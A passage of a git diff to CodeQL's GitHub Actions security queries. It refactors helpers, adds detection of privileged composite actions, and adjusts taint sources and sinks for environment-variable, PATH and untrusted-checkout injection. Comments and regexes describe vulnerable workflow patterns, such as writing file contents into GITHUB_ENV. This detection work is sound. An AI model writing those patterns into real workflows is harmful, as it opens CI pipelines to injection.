trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 2)) + ) +} + +bindingset[line] +predicate extractPathAssignment(string line, string value) { + exists(string path | + // single path assignment + path = + line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_PATH(\\})?(\"|')?", + 2) and + value = trimQuotes(path) + or + // workflow command assignment + path = + line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::add-path::(.*)(\"|')?", 3) + .regexpReplaceAll("^\"", "") + .regexpReplaceAll("\"$", "") and + value = trimQuotes(path) + ) +} + +predicate writeToGitHubEnv(Run run, string key, string value) { + extractLineAssignment(run.getScript().splitAt("\n"), "ENV", key, value) or + extractMultilineAssignment(run.getScript(), "ENV", key, value) +} + +predicate writeToGitHubOutput(Run run, string key, string value) { + extractLineAssignment(run.getScript().splitAt("\n"), "OUTPUT", key, value) or + extractMultilineAssignment(run.getScript(), "OUTPUT", key, value) +} + +predicate writeToGitHubPath(Run run, string value) { + extractPathAssignment(run.getScript().splitAt("\n"), value) +} + +predicate inPrivilegedCompositeAction(AstNode node) { + exists(CompositeAction a | + // node is in a privileged composite action + a = node.getEnclosingCompositeAction() and + ( + a.isPrivileged() + or + exists(Job caller | + caller = a.getACaller() and + caller.isPrivileged() and + caller.isExternallyTriggerable() + ) + ) + ) +} + +predicate inPrivilegedExternallyTriggerableJob(AstNode node) { + exists(Job j | + // node is in a privileged and externally triggereable job + j = node.getEnclosingJob() and + // job is privileged (write access or access to secrets) + j.isPrivileged() and + // job is triggereable by an external user + j.isExternallyTriggerable() + ) +} + +predicate inNonPrivilegedCompositeAction(AstNode node) { + exists(CompositeAction a | + // node is in a non-privileged composite action + a = node.getEnclosingCompositeAction() and + not a.isPrivileged() and + not exists(LocalJob caller | + caller = a.getACaller() and + caller.isPrivileged() and + caller.isExternallyTriggerable() + ) + ) +} + +predicate inNonPrivilegedJob(AstNode node) { + exists(Job j | + // node is in a non-privileged or not externally triggereable job + j = node.getEnclosingJob() and + ( + // job is non-privileged (no write access and no access to secrets) + not j.isPrivileged() + or + // job is triggereable by an external user + not j.isExternallyTriggerable() + ) + ) +} diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 46bbcaaf29e..ebe2c70533d 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1,6 +1,6 @@ private import codeql.actions.ast.internal.Yaml private import codeql.Locations -private import codeql.actions.Ast::Utils as Utils +private import codeql.actions.Helper private import codeql.actions.dataflow.ExternalFlow /** @@ -299,6 +299,47 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { n.lookup("inputs").(YamlMapping).maps(result.getNode(), _) and result.getNode().getValue() = name } + + LocalJobImpl getACaller() { + exists(LocalJobImpl caller, string gwf_path, string path | + // the workflow files may not be rooted in the parent directory of .github/workflows + // extract the offset so we can remove it from the action path + gwf_path = + caller + .getLocation() + .getFile() + .getRelativePath() + .prefix(caller.getLocation().getFile().getRelativePath().indexOf(".github/workflows/")) and + path = this.getLocation().getFile().getRelativePath().replaceAll(gwf_path, "") and + caller.getAStep().(UsesStepImpl).getCallee() = + path.prefix(path.indexOf(["/action.yml", "/action.yaml"])) and + result = caller + ) + } + + /** Holds if the action is privileged. */ + predicate isPrivileged() { + // there is a calling job that defines explicit write permissions + this.hasExplicitWritePermission() + or + // the actions has an explicit secret accesses + this.hasExplicitSecretAccess() + or + // there is a privileged caller job + this.getACaller().isPrivileged() + } + + private predicate hasExplicitSecretAccess() { + // the job accesses a secret other than GITHUB_TOKEN + exists(SecretsExpressionImpl expr | + expr.getEnclosingCompositeAction() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) + } + + private predicate hasExplicitWritePermission() { + // a calling job has an explicit write permission + this.getACaller().getPermissions().getAPermission().matches("%write") + } } class WorkflowImpl extends AstNodeImpl, TWorkflowNode { @@ -328,10 +369,10 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { string getName() { result = n.lookup("name").(YamlString).getValue() } /** Gets the job within this workflow with the given job ID. */ - JobImpl getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } + JobImpl getJob(string jobId) { result.getEnclosingWorkflow() = this and result.getId() = jobId } /** Gets a job within this workflow */ - JobImpl getAJob() { result = this.getJob(_) } + JobImpl getAJob() { result.getEnclosingWorkflow() = this } /** Gets the permissions granted to this workflow. */ PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } @@ -368,6 +409,10 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.getNode(), _) and result.getNode().(YamlString).getValue() = name } + + ExternalJobImpl getACaller() { + result.getCallee() = this.getLocation().getFile().getRelativePath() + } } class RunsImpl extends AstNodeImpl, TRunsNode { @@ -649,12 +694,10 @@ class JobImpl extends AstNodeImpl, TJobNode { YamlMapping n; string jobId; WorkflowImpl workflow; - YamlMappingLikeNode runson; JobImpl() { this = TJobNode(n) and - workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n and - runson = n.lookup("runs-on").(YamlMappingLikeNode) + workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n } override string toString() { result = "Job: " + jobId } @@ -765,14 +808,9 @@ class JobImpl extends AstNodeImpl, TJobNode { count(this.getATriggerEvent()) = 1 and not this.getATriggerEvent().getName() = ["pull_request", "workflow_call"] or - // The Workflow is only triggered by `workflow_call` and there is - // a caller workflow triggered by an event other than `pull_request` - this.hasSingleTrigger("workflow_call") and - exists(ExternalJobImpl call, JobImpl caller | - call.getCallee() = this.getLocation().getFile().getRelativePath() and - caller = call.getEnclosingJob() and - caller.isPrivileged() - ) + // The Workflow is a Reusable Workflow only and there is + // a privileged caller workflow + this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isPrivileged() or // The Workflow has multiple triggers so at least one is not "pull_request" count(this.getATriggerEvent()) > 1 @@ -781,14 +819,15 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the trigger event that starts this workflow. */ EventImpl getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } - private predicate hasSingleTrigger(string trigger) { - this.getATriggerEvent().getName() = trigger and - count(this.getATriggerEvent()) = 1 - } - + // private predicate hasSingleTrigger(string trigger) { + // this.getATriggerEvent().getName() = trigger and + // count(this.getATriggerEvent()) = 1 + // } /** Gets the runs-on field of the job. */ string getARunsOnLabel() { - exists(ScalarValueImpl lbl | + exists(ScalarValueImpl lbl, YamlMappingLikeNode runson | + runson = n.lookup("runs-on").(YamlMappingLikeNode) + | ( lbl.getNode() = runson.getNode(_) and not lbl.getNode() = runson.getNode("group") @@ -960,14 +999,14 @@ class UsesStepImpl extends StepImpl, UsesImpl { /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ override string getCallee() { - if u.getValue().matches("./%") - then result = u.getValue() - else + if u.getValue().indexOf("@") > 0 + then result = ( u.getValue().regexpCapture(usesParser(), 1) + "/" + u.getValue().regexpCapture(usesParser(), 2) ).toLowerCase() + else result = u.getValue() } /** Gets the version reference used when checking out the Action, e.g. `2` in `actions/checkout@v2`. */ @@ -1061,27 +1100,26 @@ abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { } private string stepsCtxRegex() { - result = Utils::wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") + result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } private string needsCtxRegex() { - result = Utils::wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") + result = wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } private string jobsCtxRegex() { - result = Utils::wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") + result = wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } -private string envCtxRegex() { result = Utils::wrapRegexp("env\\.([A-Za-z0-9_-]+)") } +private string envCtxRegex() { result = wrapRegexp("env\\.([A-Za-z0-9_-]+)") } -private string matrixCtxRegex() { result = Utils::wrapRegexp("matrix\\.(.+)") } +private string matrixCtxRegex() { result = wrapRegexp("matrix\\.(.+)") } private string inputsCtxRegex() { - result = - Utils::wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) + result = wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) } -private string secretsCtxRegex() { result = Utils::wrapRegexp("secrets\\.([A-Za-z0-9_-]+)") } +private string secretsCtxRegex() { result = wrapRegexp("secrets\\.([A-Za-z0-9_-]+)") } /** * Holds for an expression accesing the `secrets` context. @@ -1091,8 +1129,8 @@ class SecretsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; SecretsExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(secretsCtxRegex()) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(secretsCtxRegex(), 1) + normalizeExpr(expression).regexpMatch(secretsCtxRegex()) and + fieldName = normalizeExpr(expression).regexpCapture(secretsCtxRegex(), 1) } override string getFieldName() { result = fieldName } @@ -1110,9 +1148,9 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; StepsExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(stepsCtxRegex()) and - stepId = Utils::normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 1) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 2) + normalizeExpr(expression).regexpMatch(stepsCtxRegex()) and + stepId = normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 1) and + fieldName = normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 2) } override string getFieldName() { result = fieldName } @@ -1142,9 +1180,9 @@ class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; NeedsExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(needsCtxRegex()) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(needsCtxRegex(), 2) and - neededJob.getId() = Utils::normalizeExpr(expression).regexpCapture(needsCtxRegex(), 1) and + normalizeExpr(expression).regexpMatch(needsCtxRegex()) and + fieldName = normalizeExpr(expression).regexpCapture(needsCtxRegex(), 2) and + neededJob.getId() = normalizeExpr(expression).regexpCapture(needsCtxRegex(), 1) and neededJob.getLocation().getFile() = this.getLocation().getFile() } @@ -1175,9 +1213,9 @@ class JobsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; JobsExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(jobsCtxRegex()) and - jobId = Utils::normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 1) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 2) + normalizeExpr(expression).regexpMatch(jobsCtxRegex()) and + jobId = normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 1) and + fieldName = normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 2) } override string getFieldName() { result = fieldName } @@ -1200,8 +1238,8 @@ class InputsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; InputsExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(inputsCtxRegex()) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(inputsCtxRegex(), 1) + normalizeExpr(expression).regexpMatch(inputsCtxRegex()) and + fieldName = normalizeExpr(expression).regexpCapture(inputsCtxRegex(), 1) } override string getFieldName() { result = fieldName } @@ -1225,8 +1263,8 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; EnvExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(envCtxRegex()) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(envCtxRegex(), 1) + normalizeExpr(expression).regexpMatch(envCtxRegex()) and + fieldName = normalizeExpr(expression).regexpCapture(envCtxRegex(), 1) } override string getFieldName() { result = fieldName } @@ -1251,8 +1289,8 @@ class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { string fieldAccess; MatrixExpressionImpl() { - Utils::normalizeExpr(expression).regexpMatch(matrixCtxRegex()) and - fieldAccess = Utils::normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) + normalizeExpr(expression).regexpMatch(matrixCtxRegex()) and + fieldAccess = normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) } override string getFieldName() { result = fieldAccess } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index ba6430f157f..1fe4a3e7e1c 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -186,8 +186,8 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { result = rank[i](AstNode child, Location l | ( - child = super.getAJob() or - child = super.getStrategy() + child = super.getStrategy() or + child = super.getAJob() ) and l = child.getLocation() | @@ -242,7 +242,26 @@ private class JobTree extends StandardPreOrderTree instanceof LocalJob { } } -private class UsesTree extends StandardPreOrderTree instanceof Uses { +private class ExternalJobTree extends StandardPreOrderTree instanceof ExternalJob { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](AstNode child, Location l | + ( + child = super.getArgumentExpr(_) or + child = super.getInScopeEnvVarExpr(_) or + child = super.getOutputs() or + child = super.getStrategy() + ) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class UsesTree extends StandardPreOrderTree instanceof UsesStep { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index d9f7b14edd3..ca3e21e9d25 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -33,7 +33,7 @@ private predicate titleEvent(string context) { "github\\.event\\.workflow_run\\.display_title", // The event-specific title associated with the run or the run-name if set, or the value of run-name if it is set in the workflow. ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -46,7 +46,7 @@ private predicate urlEvent(string context) { "github\\.event\\.pull_request\\.head\\.repo\\.homepage", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -68,11 +68,9 @@ private predicate textEvent(string context) { "github\\.event\\.workflow_run\\.head_repository\\.description", // description "github\\.event\\.client_payload\\[[0-9]+\\]", // payload "github\\.event\\.client_payload", // payload - "github\\.event\\.inputs\\[[0-9]+\\]", // input - "github\\.event\\.inputs", // input ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -100,7 +98,7 @@ private predicate branchEvent(string context) { "github\\.event\\.merge_group\\.head_ref", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -114,7 +112,7 @@ private predicate labelEvent(string context) { "github\\.event\\.pull_request\\.head\\.label", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -134,7 +132,7 @@ private predicate emailEvent(string context) { "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -154,7 +152,7 @@ private predicate usernameEvent(string context) { "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -168,7 +166,7 @@ private predicate pathEvent(string context) { "github\\.event\\.workflow_run\\.referenced_workflows\\.path", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -181,7 +179,7 @@ private predicate jsonEvent(string context) { "github", "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", "github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", - "github\\.event\\.inputs", "github\\.event\\.issue", "github\\.event\\.merge_group", + "github\\.event\\.issue", "github\\.event\\.merge_group", "github\\.event\\.merge_group\\.committer", "github\\.event\\.pull_request", "github\\.event\\.pull_request\\.head", "github\\.event\\.pull_request\\.head\\.repo", "github\\.event\\.pages", "github\\.event\\.review", "github\\.event\\.workflow", @@ -193,7 +191,7 @@ private predicate jsonEvent(string context) { "github\\.event\\.workflow_run\\.pull_requests", ] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + normalizeExpr(context).regexpMatch(wrapRegexp(reg)) ) } @@ -204,9 +202,9 @@ class GitHubSource extends RemoteFlowSource { exists(Expression e, string context, string context_prefix | this.asExpr() = e and context = e.getExpression() and - Utils::normalizeExpr(context) = "github.head_ref" and + normalizeExpr(context) = "github.head_ref" and contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and - Utils::normalizeExpr(context).matches("%" + context_prefix + "%") and + normalizeExpr(context).matches("%" + context_prefix + "%") and flag = "branch" ) } @@ -218,11 +216,18 @@ class GitHubEventSource extends RemoteFlowSource { string flag; GitHubEventSource() { - exists(Expression e, string context, string context_prefix | + exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() and - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and - Utils::normalizeExpr(context).matches("%" + context_prefix + "%") + ( + exists(string context_prefix | + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), + context_prefix) and + normalizeExpr(context).matches("%" + context_prefix + "%") + ) + or + exists(e.getEnclosingCompositeAction()) + ) | titleEvent(context) and flag = "title" or @@ -258,11 +263,11 @@ class GitHubEventJsonSource extends RemoteFlowSource { exists(string context_prefix | contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and - Utils::normalizeExpr(context).matches("%" + context_prefix + "%") + normalizeExpr(context).matches("%" + context_prefix + "%") ) or contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and - Utils::normalizeExpr(context).regexpMatch(".*\\bgithub(\\.event)?\\b.*") + normalizeExpr(context).regexpMatch(".*\\bgithub.event\\b.*") ) ) and flag = "json" @@ -283,17 +288,6 @@ class ExternallyDefinedSource extends RemoteFlowSource { override string getSourceType() { result = sourceType } } -/** - * An input for a Composite Action - */ -class CompositeActionInputSource extends RemoteFlowSource { - CompositeAction c; - - CompositeActionInputSource() { c.getAnInput() = this.asExpr() } - - override string getSourceType() { result = "input" } -} - /** * A downloaded artifact. */ diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index cb391f2a262..bbc40d56e2b 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -35,9 +35,9 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string varName, string value | run.getInScopeEnvVarExpr(varName) = pred.asExpr() and ( - Utils::writeToGitHubEnv(run, _, value) or - Utils::writeToGitHubOutput(run, _, value) or - Utils::writeToGitHubPath(run, value) + writeToGitHubEnv(run, _, value) or + writeToGitHubOutput(run, _, value) or + writeToGitHubPath(run, value) ) and value.matches("%$" + ["", "{", "ENV{"] + varName + "%") and succ.asExpr() = run.getScriptScalar() @@ -61,7 +61,7 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo c = any(DataFlow::FieldContent ct | ct.getName() = key) and pred.asExpr() = run.getInScopeEnvVarExpr(varName) and succ.asExpr() = run and - Utils::writeToGitHubOutput(run, key, value) and + writeToGitHubOutput(run, key, value) and value.matches("%$" + ["", "{", "ENV{"] + varName + "%") ) } @@ -72,7 +72,7 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: pred.asExpr() = run.getInScopeEnvVarExpr(varName) and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - Utils::writeToGitHubEnv(run, key, value) and + writeToGitHubEnv(run, key, value) and value.matches("%$" + ["", "{", "ENV{"] + varName + "%") ) } @@ -88,7 +88,7 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da download.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and succ.asExpr() = run and - Utils::writeToGitHubOutput(run, key, value) and + writeToGitHubOutput(run, key, value) and value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) } @@ -100,7 +100,7 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF pred.asExpr() = run.getScriptScalar() and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - Utils::writeToGitHubEnv(run, key, value) and + writeToGitHubEnv(run, key, value) and value.regexpMatch([".*\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\).*"]) ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index f63af3c10be..b6b7cd53927 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -67,7 +67,7 @@ class DataFlowExpr extends Cfg::Node { } /** - * A call corresponds to a Uses steps where a 3rd party action or a reusable workflow get called + * A call corresponds to a Uses steps where a local action, 3rd party action or a reusable workflow get called */ class DataFlowCall instanceof Cfg::Node { DataFlowCall() { super.getAstNode() instanceof Uses } @@ -91,7 +91,17 @@ class DataFlowCallable instanceof Cfg::CfgScope { then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() else if this instanceof CompositeAction - then result = this.(CompositeAction).getLocation().getFile().getRelativePath() + then + result = + this.(CompositeAction) + .getLocation() + .getFile() + .getRelativePath() + .prefix(this.(CompositeAction) + .getLocation() + .getFile() + .getRelativePath() + .indexOf(["/action.yml", "/action.yaml"])) else none() } } @@ -156,7 +166,10 @@ ContentApprox getContentApprox(Content c) { result = c } * Made a string to match the ArgumentPosition type. */ class ParameterPosition extends string { - ParameterPosition() { exists(any(ReusableWorkflow w).getInput(this)) } + ParameterPosition() { + exists(any(ReusableWorkflow w).getInput(this)) or + exists(any(CompositeAction a).getInput(this)) + } } /** diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 681d6f1cfc3..87e8124db91 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -53,7 +53,8 @@ class ParameterNode extends ExprNode { ParameterNode() { this.asExpr() = input } predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { - input = c.(ReusableWorkflow).getInput(pos) + input = c.(ReusableWorkflow).getInput(pos) or + input = c.(CompositeAction).getInput(pos) } override string toString() { result = "input " + input.toString() } diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 25de24032ba..b17b4bc6b0d 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -12,7 +12,7 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { exists(Run run, UntrustedArtifactDownloadStep step, string value | this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - Utils::writeToGitHubPath(run, value) and + writeToGitHubPath(run, value) and // TODO: add support for other commands like `<`, `jq`, ... value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) @@ -32,7 +32,7 @@ class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { exists(Run run, Expression expr, string varname, string value | this.asExpr().getInScopeEnvVarExpr(varname) = expr and run.getScriptScalar() = this.asExpr() and - Utils::writeToGitHubPath(run, value) and + writeToGitHubPath(run, value) and ( value.matches("%$" + ["", "{", "ENV{"] + varname + "%") or diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 0467a51f4e9..12919004c03 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -11,7 +11,7 @@ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { exists(Run run, Expression expr, string varname, string key, string value | expr = run.getInScopeEnvVarExpr(varname) and - Utils::writeToGitHubEnv(run, key, value) and + writeToGitHubEnv(run, key, value) and run.getScriptScalar() = this.asExpr() and value.matches("%$" + ["", "{", "ENV{"] + varname + "%") ) @@ -23,7 +23,7 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { exists(Run run, UntrustedArtifactDownloadStep step, string value | this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - Utils::writeToGitHubEnv(run, _, value) and + writeToGitHubEnv(run, _, value) and // TODO: add support for other commands like `<`, `jq`, ... value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 070dcbda532..40dfbd3a0b0 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -75,7 +75,7 @@ class EnvVarInjectionRunStep extends PoisonableStep, Run { // Run step with env var definition based on file content. // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV` // eg: `echo "sha=$(> $GITHUB_ENV` - Utils::writeToGitHubEnv(this, _, value) and + writeToGitHubEnv(this, _, value) and // TODO: add support for other commands like `<`, `jq`, ... value.regexpMatch(["\\$\\(", "`"] + ["ls\\s+", "cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index f6598f1faaf..aeceaa8da75 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -4,7 +4,7 @@ import codeql.actions.DataFlow bindingset[s] predicate containsPullRequestNumber(string s) { exists( - Utils::normalizeExpr(s) + normalizeExpr(s) .regexpFind([ "\\bgithub\\.event\\.number\\b", "\\bgithub\\.event\\.issue\\.number\\b", "\\bgithub\\.event\\.pull_request\\.id\\b", @@ -24,7 +24,7 @@ predicate containsPullRequestNumber(string s) { bindingset[s] predicate containsHeadSHA(string s) { exists( - Utils::normalizeExpr(s) + normalizeExpr(s) .regexpFind([ "\\bgithub\\.event\\.pull_request\\.head\\.sha\\b", "\\bgithub\\.event\\.pull_request\\.merge_commit_sha\\b", @@ -51,7 +51,7 @@ predicate containsHeadSHA(string s) { bindingset[s] predicate containsHeadRef(string s) { exists( - Utils::normalizeExpr(s) + normalizeExpr(s) .regexpFind([ "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", "\\bgithub\\.head_ref\\b", "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", @@ -234,7 +234,7 @@ class LabelControlCheck extends ControlCheck { // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') // eg: github.event.label.name == 'safe to test' exists( - Utils::normalizeExpr(this.getCondition()) + normalizeExpr(this.getCondition()) .regexpFind([ "\\bgithub\\.event\\.pull_request\\.labels\\b", "\\bgithub\\.event\\.label\\.name\\b" ], _, _) @@ -248,7 +248,7 @@ class ActorControlCheck extends ControlCheck { // eg: github.triggering_actor != 'CI Agent' // eg: github.event.pull_request.user.login == 'mybot' exists( - Utils::normalizeExpr(this.getCondition()) + normalizeExpr(this.getCondition()) .regexpFind([ "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", "\\bgithub\\.event\\.comment\\.user\\.login\\b", @@ -262,7 +262,7 @@ class AssociationControlCheck extends ControlCheck { AssociationControlCheck() { // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) exists( - Utils::normalizeExpr(this.getCondition()) + normalizeExpr(this.getCondition()) .regexpFind([ "\\bgithub\\.event\\.comment\\.author_association\\b", "\\bgithub\\.event\\.issue\\.author_association\\b", diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index 702a454645c..27cad8b98a4 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql @@ -16,7 +16,7 @@ import PartialFlow::PartialPathGraph private module MyConfig implements 